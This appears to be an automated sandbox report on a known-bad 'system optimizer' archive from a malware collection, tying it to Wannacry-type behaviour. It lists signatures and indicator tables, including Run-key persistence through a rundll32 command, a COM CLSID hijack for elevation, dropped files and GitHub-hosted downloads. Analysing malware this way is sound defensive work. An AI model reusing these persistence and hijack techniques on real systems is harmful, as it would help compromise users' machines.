Analysis Overview
Threat Level: Known bad
The file https://github.com/Endermanch/MalwareDatabase/blob/master/davepl/AdvancedSystemOptimizer.7z was found to be: Known bad.
Malicious Activity Summary
Wannacry
Deletes shadow copies
Downloads MZ/PE file
Executes dropped EXE
Checks BIOS information in registry
Modifies file permissions
Event Triggered Execution: Component Object Model Hijacking
UPX packed file
Reads user/profile data of web browsers
Loads dropped DLL
Checks installed software on the system
Checks whether UAC is enabled
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Network Share Discovery
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Drops file in System32 directory
Drops file in Program Files directory
Subvert Trust Controls: Mark-of-the-Web Bypass
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Modifies registry class
Opens file in notepad (likely ransom note)
NTFS ADS
Uses Task Scheduler COM API
Modifies registry key
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Runs .reg file with regedit
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-08-09 23:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 23:38
Reported
2024-08-09 23:51
Platform
win11-20240802-en
Max time kernel
380s
Max time network
709s
Command Line
Signatures
Wannacry
Deletes shadow copies
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\RegClean.exe" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\Regclean.exe" | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\SOProc_SoRefRegSoAlertWxLiteNnAj = "rundll32 shell32.dll,ShellExec_RunDLL C:\\PROGRA~2\\SOFTWA~1\\soproc.exe -pack SoRefRegSoAlertWxLiteNnAj" | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\RegClean.exe" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\Run\Registry Cleaner = "C:\\PROGRA~2\\REGIST~1\\Regclean.exe" | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Network Share Discovery
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\GLBSINST.%$D | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\PROGRA~2\REGIST~1\INSTALL.LOG | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nb.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File created | C:\Program Files (x86)\Registry Cleaner Trial\~GLH0007.TMP | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ko.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zFM.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Registry Cleaner Trial\UNWISE.EXE | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7-zip.dll | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ru.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sw.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz-cyrl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\eu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\PROGRA~2\REGIST~1\RegClean.exe | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| File created | C:\Program Files (x86)\Registry Cleaner Trial\~GLH000c.TMP | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| File opened for modification | C:\PROGRA~2\REGIST~1\regclean.dll | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| File created | C:\Program Files (x86)\Registry Cleaner Trial\~GLH0005.TMP | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Registry Cleaner Trial\regclean.dll | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Registry Cleaner Trial\Registry Cleaner.chm | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\es.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\gl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\readme.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lij.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File created | C:\Program Files (x86)\Registry Cleaner Trial\~GLH0008.TMP | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| File created | C:\Program Files (x86)\Registry Cleaner Trial\~GLH0002.TMP | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Registry Cleaner Trial\soref.dll | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\hu.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Registry Cleaner Trial\License.rtf | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\tr.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File created | C:\Program Files (x86)\Registry Cleaner Trial\~GLH000a.TMP | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\io.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\is.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\si.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spc.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sv.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\bn.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\uz.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\vi.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\yo.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File created | C:\Program Files (x86)\Registry Cleaner Trial\~GLH0003.TMP | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ba.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pt.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ga.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kk.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ta.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File created | C:\Program Files (x86)\SoftwareOnline\~GLH0006.TMP | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\af.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ext.txt | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Registry Cleaner Trial\UNWISE.EXE | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\7z2407-x64.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\NetSh | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\NetSh | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\[email protected] | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\SOFTWA~1\soproc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32 | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\kJxnabybjqg = "TTxxv^YAQEcJJE\\hb" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\qjggq = "l_G`xTwri`BbprPyWEe_Z[DNKa" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\ = "RasDlg LUA" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09} | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32\ThreadingModel = "Apartment" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\zGljodoswbF = "|T^t@\\d{lC^NffBEn@z" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\eocs = "brU[cvMGKCaIszBdCp" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\zGljodoswbF = "|Tnt@\\d{lC^NffBEn@z" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation\IconReference = "@%SystemRoot%\\system32\\rasdlg.dll,-562" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\evewxZeC = "dv]erdCFAqArp@}b}sRorWd|LOtIgfU" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\pujw = "[PQkCB^qCwvWutO[PEwYCZ`u\x7fVKqEza" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\eocs = "brU[cvJGKCaIxsvo{P" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\AppId = "{0C3B05FB-3498-40C3-9C03-4B22D735550C}" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\InProcServer32\ = "%SystemRoot%\\SysWow64\\rasdlg.dll" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\LocalizedString = "@%SystemRoot%\\system32\\rasdlg.dll,-361" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\qjggq = "l_G`xTwri`BbprPyWEe_j[DNKa" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip | C:\Users\Admin\Downloads\7z2407-x64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09} | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\Elevation\Enabled = "1" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{19E3982F-F333-E95A-AB2A-6A2CFE592E09}\dUiEfhXoo = "QnYbUK|C{LO^qD@VnbEizTpua" | C:\PROGRA~2\REGIST~1\RegClean.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
